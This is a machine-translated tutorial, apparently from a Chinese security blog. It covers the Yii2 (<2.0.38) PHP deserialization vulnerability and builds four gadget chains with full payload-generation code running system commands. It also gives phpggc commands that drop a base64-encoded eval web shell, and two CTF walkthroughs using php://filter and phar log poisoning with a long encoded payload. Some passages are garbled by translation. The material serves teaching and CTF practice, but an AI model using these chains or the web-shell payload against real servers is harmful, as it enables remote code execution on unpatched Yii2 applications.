Introduction to the
Yii is a componment-based PHP framework for developing large Web applications. Prior to Yii2 2.0.38, there was a deserialization vulnerability. When a program was called unserialize(), an attacker could execute any command by constructing a specific malicious request. In this article, we will analyze yiI2’s use of chains and how to construct its own payload
Yii2 < 2.0.38 deserialize
Installation: at github.com/yiisoft/yii… Download version 2.0.37
Then in yiI-basic-app-2.0.37 basic config web. PHP to cookieValidationKey, run PHP yii serve, create a new controller
Yii - basic - app - 2.0.37 \ controllers \ \, basic TestController. PHP
<?php
namespace app\controllers;
use yii\web\Controller;
class TestController extends Controller{
public function actionTest($name){
return unserialize($name);
}
}
Copy the codeYou’re ready to test it
? r=test/test&name=Copy the codeA chain
The entrance to the chain is
Yii - basic - app - 2.0.37 \ vendor \ yiisoft \ \, basic yii2 \ db \ BatchQueryResult PHP
public function __destruct()
{
// make sure cursor is closed
$this->reset();
}
Copy the codeFollow up $this – > reset ();
public function reset() { if ($this->_dataReader ! == null) { $this->_dataReader->close(); }Copy the code$this->_dataReader ($this->_dataReader); $this->_dataReader ($this->_dataReader)
In yii – basic – app – 2.0.37 \ vendor \ yiisoft \ \, basic yii2 – gii \ SRC \ Generator PHP
public function __call($method, $attributes)
{
return $this->format($method, $attributes);
}
Copy the codeHere $method is close and $attributes is empty, continuing with format
public function format($formatter, $arguments = array())
{
return call_user_func_array($this->getFormatter($formatter), $arguments);
}
Copy the codeFollow up getFormatter
public function getFormatter($formatter)
{
if (isset($this->formatters[$formatter])) {
return $this->formatters[$formatter];
}
Copy the code$this->getFormatter($this-> arguments); $this->getFormatter($formatter)
This is where YOU can execute phpInfo
<? php namespace yii\db{ class BatchQueryResult{ private $_dataReader; public function __construct($_dataReader) { $this->_dataReader = $_dataReader; } } } namespace Faker{ class Generator{ protected $formatters = array(); public function __construct($formatters) { $this->formatters = $formatters; } } } namespace { $a = new Faker\Generator(array('close'=>'phpinfo')); $b = new yii\db\BatchQueryResult($a); print(urlencode(serialize($b))); }Copy the codeBut if we want rCE, we have to dig into the no-parameter method that we already have in YIi2
Here we can use regular matching to directly search no-parameter functions with call_user_function
call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)
Copy the codeAnd then find the two that work better
PHP public function run() {if ($this->checkAccess) {if ($this->checkAccess) {if ($this->checkAccess) { call_user_func($this->checkAccess, $this->id); } return $this->prepareDataProvider(); } yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\ createAction.php public function run() {if ($this->checkAccess) { call_user_func($this->checkAccess, $this->id); }Copy the code$this->id = $this->id = $this->id
So just build it
<? php namespace yii\db{ class BatchQueryResult{ private $_dataReader; public function __construct($_dataReader) { $this->_dataReader = $_dataReader; } } } namespace Faker{ class Generator{ protected $formatters = array(); public function __construct($formatters) { $this->formatters = $formatters; } } } namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct($checkAccess,$id){ $this->checkAccess = $checkAccess; $this->id = $id; } } } namespace { $c = new yii\rest\CreateAction('system','whoami'); $b = new Faker\Generator(array('close'=>array($c, 'run'))); $a = new yii\db\BatchQueryResult($b); print(urlencode(serialize($a))); }Copy the code
Chain 2
This is another strand of YII2 2.0.37
$this->_dataReader->close(); $this->_dataReader->close()
Find the yii – basic – app – 2.0.37 \ vendor \ yiisoft \ \, basic yii2 \ web \ DbSession PHP
class DbSession extends MultiFieldSession
{
...
public function close()
{
if ($this->getIsActive()) {
// prepare writeCallback fields before session closes
$this->fields = $this->composeFields();
Copy the code$this->composeFields()
abstract class MultiFieldSession extends Session
{
protected function composeFields($id = null, $data = null)
{
$fields = $this->writeCallback ? call_user_func($this->writeCallback, $this) : [];
Copy the code$this->writeCallback (); $this->writeCallback (); $this->writeCallback ();
I can just construct it here
<? php namespace yii\db{ class BatchQueryResult{ private $_dataReader; public function __construct($_dataReader) { $this->_dataReader = $_dataReader; } } } namespace yii\web{ class DbSession{ public $writeCallback; public function __construct($writeCallback) { $this->writeCallback = $writeCallback; } } } namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct($checkAccess,$id){ $this->checkAccess = $checkAccess; $this->id = $id; } } } namespace { $c = new yii\rest\CreateAction('system','whoami'); $b = new yii\web\DbSession(array($c, 'run')); $a = new yii\db\BatchQueryResult($b); print(urlencode(serialize($a))); }Copy the codeChain three
We can see in the commit of yii2 2.0.38 that he added a __wakeup
This limits the BatchQueryResult as the starting point of chain one, and the subsequent __call chain is not broken, so we continue looking for an __destruct
Yii - basic - app - 2.0.37 \ \, basic vendor, codeception, codeception, ext \ RunProcess PHP
public function __destruct()
{
$this->stopProcess();
}
Copy the codeFollow up with stopProcess here
public function stopProcess() { foreach (array_reverse($this->processes) as $process) { /** @var $process Process **/ if (! $process->isRunning()) { continue; }Copy the code$this->processes is controllable, so $process->isRunning() can be used to trigger __call
And then we’re going to use the same thing as chain one
<? php namespace Codeception\Extension{ class RunProcess{ private $processes = []; public function __construct($processes) { $this->processes[] = $processes; } } } namespace Faker{ class Generator{ protected $formatters = array(); public function __construct($formatters) { $this->formatters = $formatters; } } } namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct($checkAccess,$id){ $this->checkAccess = $checkAccess; $this->id = $id; } } } namespace { $c = new yii\rest\CreateAction('system','whoami'); $b = new Faker\Generator(array('isRunning'=>array($c, 'run'))); $a = new Codeception\Extension\RunProcess($b); print(urlencode(serialize($a))); }Copy the codeChain of four
Again, look for __destruct first
Yii - basic - app - 2.0.37 \ vendor \ swiftmailer \ \, basic swiftmailer \ lib \ classes \ \ Swift KeyCache \ DiskKeyCache PHP
public function __destruct() { foreach ($this->keys as $nsKey => $null) { $this->clearAll($nsKey); }}Copy the codeHere $nsKey is controllable, follow clearAll
public function clearAll($nsKey) { if (array_key_exists($nsKey, $this->keys)) { foreach ($this->keys[$nsKey] as $itemKey => $null) { $this->clearKey($nsKey, $itemKey); } if (is_dir($this->path.'/'.$nsKey)) { rmdir($this->path.'/'.$nsKey); } unset($this->keys[$nsKey]); }}Copy the codeThere is no place to trigger __call, but there is a concatenation of strings that can trigger __toString
Find yiI-basic-app-2.0.37 basic vendor codeception codeception SRC codeception Util xmlBuilder.php
public function __toString()
{
return $this->__dom__->saveXML();
}
Copy the codeAlso use it to trigger __call
<? php namespace { class Swift_KeyCache_DiskKeyCache{ private $path; private $keys = []; public function __construct($path,$keys) { $this->path = $path; $this->keys = $keys; } } } namespace Codeception\Util{ class XmlBuilder{ protected $__dom__; public function __construct($__dom__) { $this->__dom__ = $__dom__; } } } namespace Faker{ class Generator{ protected $formatters = array(); public function __construct($formatters) { $this->formatters = $formatters; } } } namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct($checkAccess,$id){ $this->checkAccess = $checkAccess; $this->id = $id; } } } namespace { $c = new yii\rest\CreateAction('system','whoami'); $b = new Faker\Generator(array('saveXML'=>array($c,'run'))); $a = new Codeception\Util\XmlBuilder($b); $d = new Swift_KeyCache_DiskKeyCache($a,array('kawhi'=>'kawhi')); print(urlencode(serialize($d))); }Copy the code
phpggc
Use./ phpggc-l yii2 to see that there are two yii2 chains
The chain can be quickly obtained using the command -u for URL encoding
./phpggc Yii2/RCE1 system id -u
Copy the codePHPGGC’s chain two terminates in an eval, so you can write a shell directly, with -b referring to base64 encoding
./phpggc Yii2/RCE2 'file_put_contents("shell.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4=")); ' -bCopy the codeThe CTF topic
[HMBCTF 2021]framework
Unzip the attachment and see HTML \controllers\ sitecontroller.php
class SiteController extends Controller
{
public function actionAbout($message = 'Hello')
{
$data = base64_decode($message);
unserialize($data);
}
Copy the codeYou can pass the parameter like this
? r=site/about&message=Copy the codeTake the chain a dozen, found that system and other functions are banned
Write a shell with PHPGGC yii2’s chain 2, and then run apache/mod disable around the ant sword, run/readFlag to get the flag
[CISCN2021 Quals]filter
It is said that this is an important content in the configuration file, may be useful to you!!
'log' => [
'traceLevel' => YII_DEBUG ? 0 : 0,
'targets' => [
[
'class' => 'yii\log\FileTarget',
'levels' => ['error'],
'logVars' => [],
],
],
],
Copy the codeSee attached sitecontroller.php and change this
public function actionIndex()
{
$file = Yii::$app->request->get('file');
$res = file_get_contents($file);
file_put_contents($file,$res);
return $this->render('index');
}
Copy the codeThe yII framework has app.log in the runtime/logs directory
Look at the dependence and discover monolog consistency
"Require" : {" PHP ":" > = 5.6.0 ", "yiisoft/yii2" : "~ 2.0.14", "yiisoft/yii2 - the bootstrap" : "~ 2.0.0 yiisoft/yii2 -", "swiftmailer" : "~ 2.0.0 | | ~ 2.1.0", "monolog/monolog" : "1.19"},Copy the codeFirst, clear the log file
? file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|conver t.base64-decode/resource=.. /runtime/logs/app.logCopy the codePHPGGC generated
php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "phpinfo" "1" --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"Copy the codeWrite to the log, notice that the character a is added at the end
/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4A=00=41=00=61=00=47=00=73=00=75=00=53=00=31=00=47=00=68=00=54=00=49=00=2B=00=6B=00=4B=00=58=00=33=00=45=00=68=00=2B=00=4D=00=44=00=71=00=54=00=76=00=6E=00=6F=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a
Copy the codeKeep the contents of phar
/? file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=.. /runtime/logs/app.logCopy the codeAnd then finally, phar protocol
/? file=phar://.. /runtime/logs/app.log/test.txtCopy the code
Then find This_is_flaaagggg in the root directory
And then use this to look for flag
php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "system" "cat /This_is_flaaagggg" --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"Copy the codeThis article deals with the following experiments: PHP deserialization Vulnerability Experiment (through this experiment, you will understand what deserialization vulnerability is, the cause of deserialization vulnerability, and how to discover and prevent such vulnerabilities.